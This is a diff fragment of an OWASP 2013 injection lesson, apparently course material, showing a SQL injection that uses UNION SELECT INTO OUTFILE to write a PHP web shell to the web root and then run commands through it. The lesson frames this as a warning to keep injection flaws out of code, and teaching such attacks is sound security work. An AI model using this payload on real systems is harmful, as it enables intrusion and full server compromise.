ss23/owasp-2013/Lesson/A1-Injection.md

 ```sql
 SELECT * FROM products WHERE description LIKE '%d' UNION SELECT '<?php exec($_GET["c"]); ?>' INTO OUTFILE '/var/www/shell.php' -- %'
 ```
-Now you simple browse to shell.php?c=ls%20-lah, and you have a shell!
+Now you simple browse to `shell.php?c=ls -lah`, and you have a shell!
 There are hundreds of ways to leverage a simple injection exploit, and while we can't cover them all here, the idea is to never have them, because as you can see, it could lead to a complete compromise before you know it.